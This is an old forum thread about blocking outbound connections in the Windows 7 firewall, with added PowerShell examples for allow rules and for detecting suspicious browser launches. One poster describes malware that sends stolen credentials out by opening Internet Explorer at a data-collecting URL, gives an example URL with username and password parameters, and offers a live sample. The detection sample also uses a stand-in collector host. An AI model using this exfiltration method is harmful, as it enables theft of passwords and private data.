Is it possible to block all connections (outbound especially) apart from the programs currently in the firewall's exception list?
Seems like the firewall only checks inbound ones.
What I need is, basically, when you run a program for the first time and you get an allow/cancel popup, if I choose cancel then it should block both inbound and outbound connections and not only the inbound ones.
-
davepermen Notebook Nobel Laureate
well, you can change the default to block outbound connections in the firewall dialog (3 times, for domain, home, and public networks).
no clue how it behaves exactly, then (a.k.a. if a popup pops.. up).
maybe group policies give more ideas? -
Yea, tried that but it doesn't work as anticipated; basically when I switch it to block, it instantly blocks everything regardless of whether that application is in the list of applications to exclude.
The only workaround I found was to create a new policy for every app/game in order to bypass that option, but it's gonna take a while to do it for every single thing.
From what I'm reading around, it's not possible to bind outbound connections to the allow/cancel buttons (popup), since Microsoft wanted to keep the firewall simple, hence not implementing that feature.
-
davepermen Notebook Nobel Laureate
blocking outbound stuff by default isn't the best thing for the default-shipping os setting anyways. imagine suddenly no tool being able to find updates, programs that need activation not being able to do so anymore. suddenly a lot of people could very easily use non-legal software, as the software can't ever communicate to the web to check its validity.
but yeah, would be nice to be able to set it somehow.. -
Zone Alarm Free?
-
Nah, I use Avira suite for that, but I wanted to give Windows Firewall another try since I totally forgot why I didn't like it in the first place
Now I remembered
-
davepermen Notebook Nobel Laureate
"Assuming Microsoft implemented an outbound firewall, the easy way for malware writers to work around it is to have an executable called iexplore.exe (or any other common program) send outbound on port 80. How is the home user supposed to know to block that when it pops up?"
interestingly, i just saw some days ago some virus doing exactly that (some iexplore.exe popping up every few seconds in the task manager, if the actualisation rate was set high enough) -
davepermen Notebook Nobel Laureate
and, to read how microsoft thinks about it:
Are default outbound filters really necessary in Vista’s firewall?
most important part: the term "Security Theater". drama to sell stuff. -
cheers ... -
davepermen Notebook Nobel Laureate
which you shouldn't be.
this is too easy for any malware coder to develop, and goes through ALL your outbound things. -
http://www.sphinx-soft.com/Vista/index.html
W7FC sits atop the Windows Firewall as a kind of features extension; it is not a third party firewall. With each new internet connection/program you will get a pop-up, similar to ZoneAlarm, in which you can choose to Block Outgoing connections, once or "forever" for any new internet connection/program. You can choose to Allow Outgoing once or "forever" as well. You can choose to apply your rule to just Incoming or Outgoing. A new rule will be added to Windows Firewall with your selection.
The free version works well (it's what I've used since the Vista RC days) and the paid version allows you to select default actions/zones. You are also able to further customize the pop-up with additional program features in the paid version.
--L. -
Darth Bane Dark Lord of the Sith
-
davepermen Notebook Nobel Laureate
nobody even thinking about my posts that outbound is 0 security gain?
-
Darth Bane Dark Lord of the Sith
-
davepermen Notebook Nobel Laureate
then you can still block it manually.
what reasons exist for that? besides the obvious, questionable one i stated above? -
Darth Bane Dark Lord of the Sith
Edit: *** just ignore this post*** I have never used windows firewall, so i shouldn't comment on it.
-
davepermen Notebook Nobel Laureate
-
Simply put, outbound connection control provides exactly zero protection against malicious code, and there is usually no good reason to worry about non-malicious software opening outbound connections, except in, hmm, "special" scenarios... -
davepermen Notebook Nobel Laureate
and zero protection against spreading malicious code, which often gets stated.
they just use existing ways to get to the web, see my code example: start internet explorer, connect to the page of choice with a nice url containing all information. simple, quick to set up, and it works.
and i've seen a virus/trojaner/spywarething (i don't care how they get all called) that did exactly that, just a week ago. -
All firewalls available to the consumer market (not including the ones large companies and banks use) are more or less on the same level of "protection" so it's just a throw in the air in the overall sense as to why to get one or the other. In actuality, if firewall a can't stop a given threat (spyware, hacker etc.), chances are firewall b can't do much either unless we're in one of those rare situational cases where there's structural or protocol differences.
Random question, but is the Windows 7 built-in firewall different from the Vista one or are they the same in essence? I know the Vista one is different than the XP one so I was just wondering. -
davepermen Notebook Nobel Laureate
it is a continuation of the one of vista. it has a new layout to configure, and i think the option to set it up for domains, homenetworks, publicnetworks independently is new.
but it's a mere evolution in how to configure, and when what rules apply. the technology behind is still the same. -
Bah, went to sleep and already found one extra page to read on, thanks for the responses.
Dave, I can think of one reason at least why outbound connections are important, /points keyloggers; if something/somehow anything like that gets installed on your system then outbound connections are kinda critical to control, don't you think?
That and the fact that it gives you more control in general as to what's happening in your computer, since you have another layer of defence to worry about (what's coming out of your computer).
As you already know, you can't configure the firewall to block everything except the programs in the exception list, since the exception list doesn't work for outbound connections, so doing it manually (the way you are suggesting) will take a lot of time, not to mention that there are programs, MSN for example, that need two processes to access the internet, so it's not as simple as putting the main .exe file in the policy.
So, I was checking if there's actually an easier way of doing that, since 3rd party software can already do that job. No reason to spend X time doing something which another firewall can do X times faster...
edit: ps: I'll repeat the same thing here: doing it manually is not an option. Go into policies and block a program manually and tell me how many "seconds" it takes for an experienced user to do that, and then tell me how much faster a single click is vs that -
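The default-block-plus-exceptions setup discussed up to this point can be scripted instead of clicked through rule by rule. This is an added example, not part of any post in the thread; it uses the `netsh advfirewall` context that ships with Vista and Windows 7, and the game paths and rule names are hypothetical placeholders.

```powershell
# Added example (not from the thread). Run from an elevated PowerShell prompt.
# Entries marked "hypothetical" are constructed sample paths; replace them.
$allowList = @(
    @{ Name = 'Internet Explorer';    Path = "$env:ProgramFiles\Internet Explorer\iexplore.exe" },
    @{ Name = 'Example game';         Path = 'C:\Games\Example\game.exe' },     # hypothetical
    @{ Name = 'Example game updater'; Path = 'C:\Games\Example\updater.exe' }   # hypothetical helper process
)

function Add-OutboundAllowRule {
    param([string]$Name, [string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) {
        Write-Warning "Skipped '$Name': $Path does not exist"
        return $false
    }
    $ruleName = "Outbound allow - $Name"
    # Remove any earlier copy so reruns do not create duplicate rules.
    & netsh advfirewall firewall delete rule "name=$ruleName" dir=out | Out-Null
    & netsh advfirewall firewall add rule "name=$ruleName" dir=out action=allow `
        "program=$Path" enable=yes profile=any | Out-Null
    return ($LASTEXITCODE -eq 0)
}

# 1. Create the per-program exceptions first, while outbound is still open.
$added = 0
foreach ($app in $allowList) {
    if (Add-OutboundAllowRule -Name $app.Name -Path $app.Path) { $added++ }
}

# 2. Only then switch all three profiles (domain, private, public) to block
#    outbound by default. The value is quoted so PowerShell passes it as one argument.
if ($added -gt 0) {
    & netsh advfirewall set allprofiles firewallpolicy 'blockinbound,blockoutbound'
    Write-Host "$added allow rule(s) created; outbound is now blocked by default."
} else {
    Write-Warning 'No allow rules were created; default outbound policy left unchanged.'
}

# To undo: netsh advfirewall set allprofiles firewallpolicy 'blockinbound,allowoutbound'
```

A program rule matches on the executable's path, so a program with a helper process needs one entry per executable, and the rule says nothing about who launched the allowed program.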
davepermen Notebook Nobel Laureate
well, the rule is simple: if your system is compromised, and your system has one way (typically iexplore, port 80) to communicate outwards, there is NO outbound tool helping.
so caring about outbound firewall settings is just completely useless. it gives you ZERO security. f.e. if you have a keylogger installed. zero security.
edit: and i could send you a virus doing exactly that. your outbound firewall would be of ZERO help. it could keylog, send out your files, your passwords, your private data. it could download and install new stuff, etc etc.
the outbound firewall could NOT stop it doing so.
it's an exe called server.exe (with a smiley icon) that regularly for a split second opens iexplore.exe with a path attached to some domain, to which it tries to communicate with, then.
so don't even try to bother about outbound firewalls. they already get compromised daily without being ON. and the reason? because it's actually more easy to do it over the default port with existing apps, like iexplore. -
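Because a per-program rule cannot tell a user-started browser from one started by another process, the case described above is a detection problem rather than a firewall-rule problem. The following added example (not part of any post) applies three triage heuristics to process records; every record, path and host name in it is a constructed sample, and the list of expected parent processes is an assumption that will flag legitimate programs that open links.

```powershell
# Added example, not from the thread. All process records are constructed samples;
# on a live system comparable fields come from Get-WmiObject Win32_Process.
$genuinePaths = @(
    'C:\Program Files\Internet Explorer\iexplore.exe',
    'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
)
$expectedParents = @('explorer.exe', 'iexplore.exe')   # assumption: normal interactive launches

function Test-BrowserLaunch {
    param($Process)
    $findings = @()
    # Same file name as the browser, but not at the installed location.
    if ($genuinePaths -notcontains $Process.Path) {
        $findings += 'browser name but not the installed browser path'
    }
    # Real browser binary, but started by something other than the shell.
    if ($expectedParents -notcontains $Process.Parent) {
        $findings += "started by $($Process.Parent)"
    }
    # A URL carrying key=value data handed over at launch.
    if ($Process.CommandLine -match 'https?://\S+\?\S+=') {
        $findings += 'URL with query parameters on the command line'
    }
    return ,$findings
}

$samples = @(
    @{ Id = 1204; Name = 'iexplore.exe'; Parent = 'explorer.exe'
       Path = 'C:\Program Files\Internet Explorer\iexplore.exe'
       CommandLine = '"C:\Program Files\Internet Explorer\iexplore.exe"' },
    @{ Id = 2310; Name = 'iexplore.exe'; Parent = 'explorer.exe'
       Path = 'C:\Users\sample\AppData\Local\Temp\iexplore.exe'
       CommandLine = 'C:\Users\sample\AppData\Local\Temp\iexplore.exe' },
    @{ Id = 3188; Name = 'iexplore.exe'; Parent = 'server.exe'
       Path = 'C:\Program Files\Internet Explorer\iexplore.exe'
       CommandLine = '"C:\Program Files\Internet Explorer\iexplore.exe" http://collector.example.invalid/c.php?u=sample' }
)

foreach ($p in $samples | Where-Object { $_.Name -ieq 'iexplore.exe' }) {
    $f = Test-BrowserLaunch $p
    if ($f.Count -gt 0) { 'pid {0}: {1}' -f $p.Id, ($f -join '; ') }
}
```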
I'm assuming you know that firewalls (proper ones at least) do package sniffing? Hence are not so stupid to fall for the filename/port trick you are suggesting
But I am willing to give it a try, find me something that can do that, it's going to be an interesting exploit from my POV -
davepermen Notebook Nobel Laureate
oh yeah, sure they do. so they do react if internet explorer (not something with that filename, but c:\program files\internet explorer\iexplore.exe, the real one, certified and signed by microsoft corporation) starts up and opens a webpage?
well, that would be a bad firewall then, sir.
and no, packet sniffing imho belongs to higher levels, like virus scanners (avast did that i think), or even the internet explorer itself, which has suspicious pages blacklisted. -
For example, Avira, since that's the one I use: there is an option when you allow something, "Allow privileged"; if you do not tick that option then the application is allowed to go into the internet but still filtered by the rules. If you tick it then it can freely do whatever it wants
-
davepermen Notebook Nobel Laureate
well, and those rules would prevent internet explorer (which you would sure not have privileged, now, would you?) to access davepermen.net/collectdata.php?username=CooLMinE&Password=Lalalalala ?
because i can tell you something? it wouldn't.
edit: and no the link obviously doesn't work. but does your firewall prevent you to browse to such links?
btw, what i can see now is that you don't "get firewalls". they are a low level construct, like a router, allowing connections through ports. everything above it is not the job of the firewall itself. of some security suite, maybe. but it's not the job of the firewall. -
I get an error 404 error with that page.
-
davepermen Notebook Nobel Laureate
and, in other news: if you get some evil software that avira doesn't detect on your system, then chance is VERY HIGH, that it doesn't know the page it sends data to is evil, too.
so no, it won't be blocked. it might, but the chance is so terribly small, your chance to die because you got hit by a toilet seat from the MIR is bigger..
-
Ah sorry about that
read it a bit too fast, yea Avira has a "service" (feature) to scan urls for "bad coding" so I guess it should prevent me from entering that url if there's something odd about it.
Don't confuse what I say with higher level hacking though, of course if you want to hack something you can, nothing is 100% secure. I'm just trying to do the best I can with the "best" tools I can find, since all tools have their cons and pros.
I know that most firewalls are low level firewalls, including the router ones, so I'm sure you can see why I'm looking into outbound connections
But I'm really interested in that name/port exploit, cause if it works then it's a major flaw in the systems. -
davepermen Notebook Nobel Laureate
no you're not looking into outbound connections then, as this is a lowlevel construct that completely FAILS.
what you look is simply full data control on what you do inwards and outwards. this has nothing to do with a firewall. a firewall never cares about data, it shall be completely non-discriminating. -
Of course it cares about data, hence why it's installing the driver into your connection.
Even corporate firewalls get penetrated easily, the point is that in some cases they are better than X. Even with sniffing all packages received for headers and patterns you can still inject packages with false information and forward them.
Firewall should care about data, since packages received = data, and the firewall's job is to control/filter those packages -
davepermen Notebook Nobel Laureate
no, firewall is about ports, opening and closing them. that way it's 100% clear what it does. there is no "if it's updated", or something.
that is the job of the virus scanner. how it does it is unimportant. it should just detect everything (which it can't). or malware scanner, or evilstuffscanner, whatever you wanna call it. if it does it by packet sniffing, or by signing executables to make sure they're proper, or whatever, that's the choice of the vendor.
but the firewall is a simple black/white list of ports/executables. nothing more. -
Yea, I guess you can put it that way, I was talking about firewalls (software) that companies sell today
A firewall as a word, yea, its job will be what you said, but today's firewalls (since they are labelled that way, software ones at least) do more than just ports. -
davepermen Notebook Nobel Laureate
and that is stupid. they just name their stuff to sound fancy, and then call it better as it's just not the same. i can call a ferrari a fast smart. but it still isn't a smart (try to park it into the same small spot).
those security suites are all sort of things. but a firewall (like uac) is a simple, one trick pony. the advantage: it does that one trick perfectly well (like math. 2+2=4, always.. not a "i like that green more, it's more.. you know.. pretty, don't you think, too?")
it's a hard, cold, clearly defined boundary. no way through it, only around it.
anything above that, more high level, about scanning, detecting, and such, is never to trust 100%. hard defined boundaries are trustable. they are not the only thing that you can rely on, but they are something you can then rely on 100%.
btw..
cool COOL-F574B2AB5F
-
Yeap, that's the VM machine without protection on it, seems to be refusing to run on Win7 though, PM'ed you
Windows 7 Firewall
Discussion in 'Windows OS and Software' started by CooLMinE, Dec 20, 2009.